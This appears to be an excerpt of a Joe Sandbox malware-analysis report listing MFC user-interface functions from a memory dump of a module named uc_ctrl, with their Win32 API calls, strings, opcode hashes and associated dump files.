Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
String ID:
API String ID: 4119827998-0
Opcode ID: 21bc9ba3fb27938a8bc86be8bb6b3a2d3526440e3e05c3561482d9eecbd4f657
Instruction ID: d33cf154b39a3a22fb3c4b49d7058c979f8dcfbb7074c59c2378ba7de636d703
Opcode Fuzzy Hash: 21bc9ba3fb27938a8bc86be8bb6b3a2d3526440e3e05c3561482d9eecbd4f657
Instruction Fuzzy Hash: CED129B1A01259AFDF11DFA4C984ADEBBB9FF09304F14426AE909EB240D771AA45CF50

Function 6CB21A46 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 169libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6CB21A79
GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6CB21A89
EncodePointer.KERNEL32(00000000,?,?), ref: 6CB21A92
DecodePointer.KERNEL32(C37EB885,?,?), ref: 6CB21AA0
GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6CB21AC9
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6CB21AE9
_wcslen.LIBCMT ref: 6CB21AF2
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6CB21B12
_wcslen.LIBCMT ref: 6CB21B1B
GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB21B40
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6CB21B60
_wcslen.LIBCMT ref: 6CB21B69
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6CB21B92
_wcslen.LIBCMT ref: 6CB21B9B
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6CB21BC8
_wcslen.LIBCMT ref: 6CB21BD4

Strings

kernel32.dll, xrefs: 6CB21A74
GetThreadPreferredUILanguages, xrefs: 6CB21A83

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: DownlevelLocaleName___crt_wcslen$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
String ID: GetThreadPreferredUILanguages$kernel32.dll
API String ID: 989863645-1646127487
Opcode ID: bd406765e6e8e05d6e6e34a0525171f7f8ed7867aa9143b7a803f51f6abf2ad4
Instruction ID: afd0874c248a7ecc7e7396acc03a02bd3cdeacc7b4473d7e24dfe6f7270da6c6
Opcode Fuzzy Hash: bd406765e6e8e05d6e6e34a0525171f7f8ed7867aa9143b7a803f51f6abf2ad4
Instruction Fuzzy Hash: 8A514EB2A10209AFDB14DFA4C984DFF77B8EF49304F440129E905E7640EB35E9198BA1

Function 6CB27DFF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D632: GetWindowLongW.USER32(?,000000F0), ref: 6CB2D63F

GetParent.USER32(?), ref: 6CB27E35
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6CB27E58
GetWindowRect.USER32(?,00000000), ref: 6CB27E7B
GetWindowLongW.USER32(00000000,000000F0), ref: 6CB27EAE
MonitorFromWindow.USER32(00000000,00000001), ref: 6CB27EE4
GetMonitorInfoW.USER32(00000000), ref: 6CB27EEB
CopyRect.USER32(?,?), ref: 6CB27EF9
GetWindowRect.USER32(00000000,?), ref: 6CB27F06
MonitorFromWindow.USER32(00000000,00000002), ref: 6CB27F13
GetMonitorInfoW.USER32(00000000), ref: 6CB27F1A
CopyRect.USER32(?,?), ref: 6CB27F28
GetParent.USER32(?), ref: 6CB27F33
GetClientRect.USER32(00000000,?), ref: 6CB27F40
GetClientRect.USER32(00000000,?), ref: 6CB27F4B
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 6CB27F59

Strings

(, xrefs: 6CB27EC6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
String ID: (
API String ID: 3610148278-3887548279
Opcode ID: 9ea4837ce640446171fe619530a427484b5be0ad6742b7fa235065cdef4dfb3b
Instruction ID: 3a322ea27f81115f90b313eab6b9a3d9042b46e12e805e8a07a899fab101f5cf
Opcode Fuzzy Hash: 9ea4837ce640446171fe619530a427484b5be0ad6742b7fa235065cdef4dfb3b
Instruction Fuzzy Hash: EC614A72A01209AFDF00DFA8CD88AEEBBB9FF4A314F150214E515F7284DB74A905CB64

Function 6CB32F0F Relevance: 28.7, APIs: 19, Instructions: 239windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB32F16
CreateRectRgnIndirect.GDI32(?), ref: 6CB32F50
CopyRect.USER32(?,?), ref: 6CB32F64
InflateRect.USER32(?,?,?), ref: 6CB32F7A
IntersectRect.USER32(?,?,?), ref: 6CB32F86
CreateRectRgnIndirect.GDI32(?), ref: 6CB32F90
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6CB32FA5
CombineRgn.GDI32(?,?,?,00000003), ref: 6CB32FBF
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6CB3300B
SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6CB33028
CopyRect.USER32(?,?), ref: 6CB33033
InflateRect.USER32(?,?,?), ref: 6CB33049
IntersectRect.USER32(?,?,?), ref: 6CB33055
SetRectRgn.GDI32(?,?,?,?,?), ref: 6CB3306A
CombineRgn.GDI32(?,?,?,00000003), ref: 6CB3307B
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6CB33092
CombineRgn.GDI32(?,?,?,00000003), ref: 6CB330AC

Part of subcall function 6CB3326B: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00000000), ref: 6CB332B2
Part of subcall function 6CB3326B: CreatePatternBrush.GDI32(00000000), ref: 6CB332BF
Part of subcall function 6CB3326B: DeleteObject.GDI32(00000000), ref: 6CB332CB

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6CB33108
PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6CB33167

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Create$Combine$CopyIndirectInflateIntersect$BitmapBrushDeleteException@8H_prolog3_ObjectPatternThrow
String ID:
API String ID: 1437591364-0
Opcode ID: 2c4a8fc6c97abd14ba1c12081af57ea50c3159095ef5fa63807745b93a4512db
Instruction ID: 059558a1f20a4161910d2aa6bce7b76f0a5b370ae7a466ae3aef5f80e2239115
Opcode Fuzzy Hash: 2c4a8fc6c97abd14ba1c12081af57ea50c3159095ef5fa63807745b93a4512db
Instruction Fuzzy Hash: 8391D1B1E01258AFCF05DFE4D998DEEBBB9BF09304B045129F906E3654DB389909CB64

Function 6CB5CBF3 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

APIs

CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CC56
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CC65
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CC74
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CC83
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CC92
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCA1
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCB0
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCBF
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCCE
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCDD
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCEC
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CCFB
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD0A
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD19
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD28
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD37
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD46
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD55
CloseThemeData.UXTHEME(00000000,?,?,?,00000000,6CB64748,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB5CD64

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CloseDataTheme
String ID:
API String ID: 2797872399-0
Opcode ID: c1251b74d5a464a36ac18c1322323c88a840112b6d707e8e5aa8afd83a120d1a
Instruction ID: 0895a787a8a1371e71780b784185342b4ea854a888a78be897aa9e6f3672b9fa
Opcode Fuzzy Hash: c1251b74d5a464a36ac18c1322323c88a840112b6d707e8e5aa8afd83a120d1a
Instruction Fuzzy Hash: 9541FC30202754DFDB226F19DA0C75ABBF3FB0530AFA85929E09652CB0D775A8A5CF41

Function 6CBC2416 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 359timewindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6CBC242D
GetCursorPos.USER32(00000000), ref: 6CBC244B
ScreenToClient.USER32(00000000,00000000), ref: 6CBC2458
GetParent.USER32(?), ref: 6CBC2521
SetTimer.USER32(00000000,0000EC18,FFFFFFFE,00000000), ref: 6CBC257F
InvalidateRect.USER32(00000000,00000054,00000001), ref: 6CBC258E
UpdateWindow.USER32(00000000), ref: 6CBC2597
KillTimer.USER32(00000000,0000EC18,00000000,?,?,00000000), ref: 6CBC25B2
GetParent.USER32(?), ref: 6CBC2684
GetParent.USER32(?), ref: 6CBC26EC
SendMessageW.USER32(?,0000011F,?,?), ref: 6CBC276B
KillTimer.USER32(0000EC18,0000EC18,?,?,00000000), ref: 6CBC27A4
__EH_prolog3.LIBCMT ref: 6CBC27BC
GetCursorPos.USER32(?), ref: 6CBC2885

Part of subcall function 6CBC7892: __EH_prolog3.LIBCMT ref: 6CBC7899

Strings

MenuShowDelay, xrefs: 6CBC2833
Control Panel\Desktop, xrefs: 6CBC2806

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ParentTimer$CursorH_prolog3KillWindow$ClientInvalidateMessageRectScreenSendUpdate
String ID: Control Panel\Desktop$MenuShowDelay
API String ID: 3950007754-702829638
Opcode ID: 5425c812ac395c668b96607d26c1358e3ea8f10bb76a391207627a9c05264909
Instruction ID: 4693dcca4d1179eb9c2249c4ad37e6a7e486d82f72ed4eb16e74edee3a8af6b6
Opcode Fuzzy Hash: 5425c812ac395c668b96607d26c1358e3ea8f10bb76a391207627a9c05264909
Instruction Fuzzy Hash: E8D1D071B012519FEF049F64C898AAE7BB5FF44318F14116AE815ABBA1DB34DD04CB92

Function 6CB5997F Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB59989

Strings

(, xrefs: 6CB59AA7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3_
String ID: (
API String ID: 2427045233-3887548279
Opcode ID: d76b0cf4cf121f80ec5939c97b5b3cc1610907fd945769e3e609402ad9fee3f0
Instruction ID: 1f140e3ee8769b7d6dea4710de29c5379f9db2011b1228fd063e1e5f2894e097
Opcode Fuzzy Hash: d76b0cf4cf121f80ec5939c97b5b3cc1610907fd945769e3e609402ad9fee3f0
Instruction Fuzzy Hash: AAC13970E012699AEB24DF65CC44BEEBBB5FF4A300F0481EAE54DA7251DB305A95CF21

Function 6CB361F4 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00003020), ref: 6CB3621C
GetDlgItem.USER32(?,00003020), ref: 6CB36247
GetWindowRect.USER32(00000000,?), ref: 6CB36262
MapDialogRect.USER32(?,?), ref: 6CB3628A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000020,00000016), ref: 6CB362B4
GetDlgItem.USER32(?,00000001), ref: 6CB362C5
GetWindowRect.USER32(00000000,?), ref: 6CB362D7
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015,?), ref: 6CB362FB
GetWindowRect.USER32(?,?), ref: 6CB36310
GetWindowRect.USER32(?,?), ref: 6CB36373
GetDlgItem.USER32(?,00000001), ref: 6CB3638A
GetWindowRect.USER32(00000000,?), ref: 6CB36399
GetDlgItem.USER32(?,00000001), ref: 6CB363C2
ShowWindow.USER32(00000000,00000000), ref: 6CB363D1
EnableWindow.USER32(00000000,00000000), ref: 6CB363DA

Strings

, xrefs: 6CB36283

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Rect$Item$DialogEnableShow
String ID:
API String ID: 763981185-3916222277
Opcode ID: 2fb4ce00f6e27fb14af21a7ba9fcdb1dbff3d7907113802df5a8ca8abf7409f9
Instruction ID: eef77bc8217f867c52fe85bca88096ddb85ba96de1893d02e5cd46f85ac8241f
Opcode Fuzzy Hash: 2fb4ce00f6e27fb14af21a7ba9fcdb1dbff3d7907113802df5a8ca8abf7409f9
Instruction Fuzzy Hash: 186107B1A01259AFEB118FA9CD88EBFBBB9FF49304F101129E519E7250DB3499048B61

Function 6CB45F50 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 236windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000120B,00000000,00000001), ref: 6CB45FA8
GetClientRect.USER32(?,?), ref: 6CB45FC1
GetSystemMetrics.USER32(00000015), ref: 6CB45FE1
GetSystemMetrics.USER32(00000015), ref: 6CB4600C

Part of subcall function 6CB8602D: __EH_prolog3.LIBCMT ref: 6CB86034

Part of subcall function 6CB482F7: RedrawWindow.USER32(?,00000000,00000000,00000105,?,00000000,00000001,00000001,00000000,?,6CB461A4,?,00000000,MFCPropertyGrid_AlphabeticMode,?,00000000), ref: 6CB48351

InvalidateRect.USER32(?,?,00000001), ref: 6CB46030
UpdateWindow.USER32(?), ref: 6CB46039
__EH_prolog3.LIBCMT ref: 6CB460B4

Strings

MFCPropertyGrid_DescriptionArea, xrefs: 6CB460EE
MFCPropertyGrid_ModifiedProperties, xrefs: 6CB461AB
MFCPropertyGrid_AlphabeticMode, xrefs: 6CB46188
Value, xrefs: 6CB4616D
MFCPropertyGrid_HeaderCtrl, xrefs: 6CB4615B
MFCPropertyGrid_DescriptionRows, xrefs: 6CB46128
MFCPropertyGrid_VSDotNetLook, xrefs: 6CB461CF
Property, xrefs: 6CB46172

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3MetricsRectSystemWindow$ClientInvalidateMessageRedrawSendUpdate
String ID: MFCPropertyGrid_AlphabeticMode$MFCPropertyGrid_DescriptionArea$MFCPropertyGrid_DescriptionRows$MFCPropertyGrid_HeaderCtrl$MFCPropertyGrid_ModifiedProperties$MFCPropertyGrid_VSDotNetLook$Property$Value
API String ID: 1592221277-2695045869
Opcode ID: 742a5260a5fd62ca740a952e0e8194948d19c769c288b952b6c3bc5bb4f98fd8
Instruction ID: ef8c4f0ed94be7653fc7cb8fe14fe624a9eda28e1c1581c574099bd81dcb7c27
Opcode Fuzzy Hash: 742a5260a5fd62ca740a952e0e8194948d19c769c288b952b6c3bc5bb4f98fd8
Instruction Fuzzy Hash: 338162B1A01259AFDF01DFA4CD949EEBBB8FF08218F104129E815E7B50DB319E09DB51

Function 6CB2BC0A Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB2BC14

Part of subcall function 6CB1EA42: __EH_prolog3.LIBCMT ref: 6CB1EA5A

CallNextHookEx.USER32(?,?,?,?), ref: 6CB2BC53

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

GetClassNameW.USER32(?,?,00000100), ref: 6CB2BCF0
GetClassLongW.USER32(?,000000E0), ref: 6CB2BD16
GetWindowLongW.USER32(?,000000FC), ref: 6CB2BD2F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6CB2BD45
SetPropW.USER32(?,AfxOldWndProc423,00000000), ref: 6CB2BD5A
GetPropW.USER32(?,AfxOldWndProc423), ref: 6CB2BD66
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6CB2BD79
SetWindowLongW.USER32(?,000000FC,Function_0003BAA3), ref: 6CB2BD87

Part of subcall function 6CB2D267: GetClassInfoExW.USER32(?,?,?), ref: 6CB2D29E

SetWindowLongW.USER32(?,000000FC,6CB2749C), ref: 6CB2BDE4
CallNextHookEx.USER32(?,00000003,?,?), ref: 6CB2BE0E
UnhookWindowsHookEx.USER32(?), ref: 6CB2BE22

Strings

AfxOldWndProc423, xrefs: 6CB2BD3F, 6CB2BD54, 6CB2BD60, 6CB2BD74
#32768, xrefs: 6CB2BCCA, 6CB2BCD0, 6CB2BD06

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Long$ClassHookPropWindow$CallNext$AtomException@8GlobalH_prolog3H_prolog3_InfoNameThrowUnhookWindows
String ID: #32768$AfxOldWndProc423
API String ID: 149436623-2141921550
Opcode ID: 3283f2cf6dcb47e1e010c95c9ee82e47d3842f3fbc09854a1c7f4f6c8fac3861
Instruction ID: 0408f19b6126088f212e042a1b89c45bd579d494511f393dbbb8b88fa7a6f334
Opcode Fuzzy Hash: 3283f2cf6dcb47e1e010c95c9ee82e47d3842f3fbc09854a1c7f4f6c8fac3861
Instruction Fuzzy Hash: 0A51BF70A05265ABCB11AF64DC48FBF3B74EF06764F140594E809A7A90EF348A41CB91

